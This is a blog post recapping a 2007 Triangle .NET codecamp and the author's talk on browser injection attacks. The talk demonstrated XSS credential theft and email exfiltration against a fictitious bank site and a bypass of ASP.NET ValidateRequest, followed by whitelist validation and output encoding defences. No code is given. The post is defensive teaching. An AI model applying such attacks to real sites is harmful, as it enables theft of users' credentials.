Recently, the TRINUG (Triangle .Net Users Group) held a codecamp at ECPI on June 23, 2007 in Raleigh, NC . It was quite an event!! There were 23 speakers with 25 presentations on various .Net related subjects including: AJAX, Silverlight, Web Parts, WPF, LINQ and more. The day started off with a bang with keynote speaker Rod Paddock from CODE magazine and finished with a 32 inch LCD HDTV give-away sponsored by FarPoint technologies and pocket PC and software by Microsoft. I would like to personally thank ALL the sponsors, speakers and the 130 attendees for making this best TRINUG codecamp ever.
My presentation involved Web Site security with a focus on browser injection vulnerabilities. The fictitious Sanford and Son Bank web site and the “Hacked” web site were used a tool to demonstrate the impact of not protecting your web site against browser injection attacks like cross site scripting(XSS) and SQL injection.
The demo included the creation of a hyper link that directs the user to their expected "Sanford and Son" bank web site login page. The user logs in into the bank web site and views the "members" homepage as expected. Behind the scenes without the user’s knowledge, his/her user name and password were stolen and inserted into the “Hacked” web site database.
Also, some script was injected into the database for a bank “blog” page in a manner so the email address of any one that posts their comments to the blog entry would be sent to the “Hacked” web site.
Next, we turned on the ASP.NET “ValidateRequest=true” feature to block the login XSS attack. I demonstrated that is feature alone is not enough and showed new attack to steal the username/ password.
The remainder of the presentation focused on using the "white list" approach to “evil input” validation/sanitizatrion and output encoding to prevent these types of attacks using regular expression validation, and the Microsoft Anti-Cross Site Scripting Library V1.5 response encoding library. The presentation includes hyper links for further research into these types of attacks and other security related issues.